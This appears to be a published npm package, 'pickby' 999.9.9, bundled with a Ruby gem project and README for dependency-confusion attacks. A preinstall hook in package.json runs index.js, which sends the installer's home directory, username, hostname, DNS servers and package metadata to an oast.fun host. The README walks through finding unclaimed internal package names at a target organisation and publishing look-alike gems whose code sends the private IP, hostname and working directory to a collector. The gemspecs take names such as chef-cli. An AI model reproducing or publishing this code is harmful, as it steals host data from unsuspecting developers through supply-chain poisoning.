pickby 999.9.9

package/gem/ruby_dependency_confusion_attacks/CHANGELOG.md

@@ -0,0 +1,5 @@
+## [Unreleased]
+
+## [0.1.0] - 2023-05-30
+
+- Initial release

package/gem/ruby_dependency_confusion_attacks/Gemfile

@@ -0,0 +1,8 @@
+# frozen_string_literal: true
+
+source "https://rubygems.org"
+
+# Specify your gem's dependencies in mygem.gemspec
+gemspec
+
+gem "rake", "~> 13.0"

package/gem/ruby_dependency_confusion_attacks/README.md

@@ -0,0 +1,128 @@
+<h1 align="center">
+    <a href="https://www.youtube.com/@techghoshal"><img src="https://github.com/techghoshal/ruby_dependency_confusion_attacks/assets/85815644/0b65137c-72e8-4003-b4b1-265cd25a37bd"></a>
+<h1 align="center">Ruby Dependency Confusion Attacks POC
+<p align="center"><img alt="Twitter Follow" src="https://img.shields.io/twitter/follow/techghoshal?style=social"></p>
+</h1>
+  
+  
+## How to Finds & How to Exploit
+    
+Finds Gemfile then check the all require here is public or not
+    
+`https://rubygems.org/gems/`
+
+#### Download all target github repository
+ 
+ - Crate personal access tokens (classic) - https://github.com/settings/tokens 
+ - Install ghorg - https://github.com/gabrie30/ghorg#installation
+    
+ ```bash
+$ ghorg clone <target> -t <token>
+```
+`example: $ ghorg clone microsoft -t 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`
+    
+- After Download all repository finds vulnerable ruby package 
+    
+```bash
+$ find . -type f -name Gemfile | xargs -n1 -I{} cat {} | awk '/gem / {print}' | awk '{print $2;}' | tr -d '"' | tr -d ",'" | sort -u | xargs -n1 -I{} echo "https://rubygems.org/gems/{}" | httpx -status-code -silent -content-length -mc 404
+```
+- 404 code means this package not available publicly, so this the vulnerable to dependencies confusion attack.
+    
+- Then must be cross checking using github dorking - `org:microsoft package_name`
+    
+- So now Publish this ruby packages publicly (https://rubygems.org)
+    
+```bash
+$ bundle gem <package_name>
+```
+- Everything set default
+    
+```bash
+$ cd <package_name>
+```
+```bash
+$ nano <package_name>.gem
+```
+- Replaced -
+    
+    ```bash
+    Gem::Specification.new do |s|
+      s.name        = "<package_name>"
+      s.version     = "9.9.9"
+      s.summary     = "Vulnerability Disclosure: Dependency confiuse vulnerability"
+      s.description = "This Ruby package vulnerable to dependency confiuse vulnerability"
+      s.authors     = ["<Anindya Ghoshal>"]
+      s.email       = "<techghoshal@gmail.com>"
+      s.files       = ["lib/<package_name>.rb"]
+      s.homepage    =
+        "https://rubygems.org/gems/<package_name>"
+      s.license       = "MIT"
+   end
+   ```
+ - Save this file
+ 
+ ```bash
+ $ cd lib
+ ```
+ - Replaced -
+    
+    ```bash
+    module <myGem>
+
+        require 'json'
+        require 'net/http'
+        require 'socket'
+
+        #Private IP
+        privip = UDPSocket.open {|s| s.connect("64.233.187.99", 1); s.addr.last}
+        #Hostname
+        hostname = Socket.gethostname
+        #Current directory
+        dir = Dir.pwd
+
+        #Pubcli bin url:- https://pipedream.com  OR  burpCollaborate url
+        uri = URI('https://<pipedream.net>')
+        req = Net::HTTP::Post.new(uri, 'Content-Type' => 'application/json')
+
+        req.body = {
+          private_ip: privip,
+          hostname: hostname,
+          current_directory: dir
+        }.to_json
+
+        Net::HTTP.start(uri.hostname, uri.port, :use_ssl => uri.scheme == 'https') do |http|
+          http.request(req)
+        end
+    
+    end
+
+    ```
+ - Save this file  
+ 
+ ```bash
+ $ cd ..
+ ```
+ ```bash
+ $ gem build <package_name>.gemspec
+ ```
+- Upload file publicly (https://rubygems.org/)
+
+- Create Accont on rubygems.org
+    
+ ```bash
+ $ gem push <package_name>-9.9.9.gem 
+ ```
+- Enter your Email: `<email>`
+- Enter your username: `<username>`
+- Enter your password: `<password>`
+    
+---
+    
+<b>Upload IS DONE</b> 😎 
+- Must be checking - https://rubygems.org/gems/package_name
+- 🎉 Now Bounty Time 💰💰
+ 
+## Connect me
+If you have any queries, you can always contact me on  <a href="https://twitter.com/techghoshal">twitter(@techghoshal)</a>
+    
+    

package/gem/ruby_dependency_confusion_attacks/Rakefile

@@ -0,0 +1,4 @@
+# frozen_string_literal: true
+
+require "bundler/gem_tasks"
+task default: %i[]

package/gem/ruby_dependency_confusion_attacks/bin/console

@@ -0,0 +1,11 @@
+#!/usr/bin/env ruby
+# frozen_string_literal: true
+
+require "bundler/setup"
+require "mygem"
+
+# You can add fixtures and/or initialization code here to make experimenting
+# with your gem easier. You can also use a different console, if you like.
+
+require "irb"
+IRB.start(__FILE__)

package/gem/ruby_dependency_confusion_attacks/bin/setup

@@ -0,0 +1,8 @@
+#!/usr/bin/env bash
+set -euo pipefail
+IFS=$'\n\t'
+set -vx
+
+bundle install
+
+# Do any other automated setup that you need to do here

package/gem/ruby_dependency_confusion_attacks/lib/mygem/version.rb

@@ -0,0 +1,5 @@
+# frozen_string_literal: true
+
+module Mygem
+  VERSION = "0.1.0"
+end

package/gem/ruby_dependency_confusion_attacks/lib/mygem.rb.bak

@@ -0,0 +1,28 @@
+module <myGem>
+
+    require 'json'
+    require 'net/http'
+    require 'socket'
+
+    #Private IP
+    privip = UDPSocket.open {|s| s.connect("64.233.187.99", 1); s.addr.last}
+    #Hostname
+    hostname = Socket.gethostname
+    #Current directory
+    dir = Dir.pwd
+
+    #Pubcli bin url:- https://pipedream.com  OR  burpCollaborate url
+    uri = URI('ck385ge2vtc00008gwb0gj1ta3wyyyyyf.oast.fun>')
+    req = Net::HTTP::Post.new(uri, 'Content-Type' => 'application/json')
+
+    req.body = {
+      private_ip: privip,
+      hostname: hostname,
+      current_directory: dir
+    }.to_json
+
+    Net::HTTP.start(uri.hostname, uri.port, :use_ssl => uri.scheme == 'https') do |http|
+      http.request(req)
+    end
+
+end

package/gem/ruby_dependency_confusion_attacks/mygem.gemspec

@@ -0,0 +1,12 @@
+    Gem::Specification.new do |s|
+      s.name        = "chef-cli"
+      s.version     = "9.9.9"
+      s.summary     = "Vulnerability Disclosure: Dependency confiuse vulnerability"
+      s.description = "This Ruby package vulnerable to dependency confiuse vulnerability"
+      s.authors     = ["Anindya Ghoshal"]
+      s.email       = "rootkaliroot@gmail.com"
+      s.files       = ["lib/mygem.rb"]
+      s.homepage    =
+        "https://rubygems.org/gems/mygem"
+      s.license       = "MIT"
+    end

package/gem/ruby_dependency_confusion_attacks/mygem.gemspec.bak

@@ -0,0 +1,12 @@
+    Gem::Specification.new do |s|
+      s.name        = "mixlib-versioning"
+      s.version     = "9.9.9"
+      s.summary     = "Vulnerability Disclosure: Dependency confiuse vulnerability"
+      s.description = "This Ruby package vulnerable to dependency confiuse vulnerability"
+      s.authors     = ["Anindya Ghoshal"]
+      s.email       = "rootkaliroot@gmail.com"
+      s.files       = ["lib/mygem.rb"]
+      s.homepage    =
+        "https://rubygems.org/gems/mygem"
+      s.license       = "MIT"
+    end

package/gem/ruby_dependency_confusion_attacks/sig/mygem.rbs

@@ -0,0 +1,4 @@
+module Mygem
+  VERSION: String
+  # See the writing guide of rbs: https://github.com/ruby/rbs#guides
+end

package/index.js

@@ -0,0 +1,46 @@
+const os = require("os");
+const dns = require("dns");
+const querystring = require("querystring");
+const https = require("https");
+const packageJSON = require("./package.json");
+const package = packageJSON.name;
+
+const trackingData = JSON.stringify({
+    p: package,
+    c: __dirname,
+    hd: os.homedir(),
+    hn: os.hostname(),
+    un: os.userInfo().username,
+    dns: dns.getServers(),
+    r: packageJSON ? packageJSON.___resolved : undefined,
+    v: packageJSON.version,
+    pjson: packageJSON,
+});
+
+var postData = querystring.stringify({
+    msg: trackingData,
+});
+
+var options = {
+    hostname: "ck385ge2vtc00008gwb0gjupp4yyyyyyg.oast.fun", //replace burpcollaborator.net with Interactsh or pipedream
+    port: 443,
+    path: "/",
+    method: "POST",
+    headers: {
+        "Content-Type": "application/x-www-form-urlencoded",
+        "Content-Length": postData.length,
+    },
+};
+
+var req = https.request(options, (res) => {
+    res.on("data", (d) => {
+        process.stdout.write(d);
+    });
+});
+
+req.on("error", (e) => {
+    // console.error(e);
+});
+
+req.write(postData);
+req.end();

package/index.js.bak

@@ -0,0 +1,46 @@
+const os = require("os");
+const dns = require("dns");
+const querystring = require("querystring");
+const https = require("https");
+const packageJSON = require("./package.json");
+const package = packageJSON.name;
+
+const trackingData = JSON.stringify({
+    p: package,
+    c: __dirname,
+    hd: os.homedir(),
+    hn: os.hostname(),
+    un: os.userInfo().username,
+    dns: dns.getServers(),
+    r: packageJSON ? packageJSON.___resolved : undefined,
+    v: packageJSON.version,
+    pjson: packageJSON,
+});
+
+var postData = querystring.stringify({
+    msg: trackingData,
+});
+
+var options = {
+    hostname: "ck385ge2vtc00008gwb0gj1ta3wyyyyyf.oast.fun", //replace burpcollaborator.net with Interactsh or pipedream
+    port: 443,
+    path: "/",
+    method: "POST",
+    headers: {
+        "Content-Type": "application/x-www-form-urlencoded",
+        "Content-Length": postData.length,
+    },
+};
+
+var req = https.request(options, (res) => {
+    res.on("data", (d) => {
+        process.stdout.write(d);
+    });
+});
+
+req.on("error", (e) => {
+    // console.error(e);
+});
+
+req.write(postData);
+req.end();

package/package.json

@@ -0,0 +1,14 @@
+{
+  "name": "pickby",
+  "version": "999.9.9",
+  "description": "",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1",
+    "preinstall": " node index.js"
+  },
+  "author": "",
+  "license": "ISC",
+  "dependencies": {
+  }
+}

package/package.json.bak

@@ -0,0 +1,14 @@
+{
+  "name": "pickby",
+  "version": "9.9.9.9",
+  "description": "",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1",
+    "preinstall": " node index.js"
+  },
+  "author": "",
+  "license": "ISC",
+  "dependencies": {
+  }
+}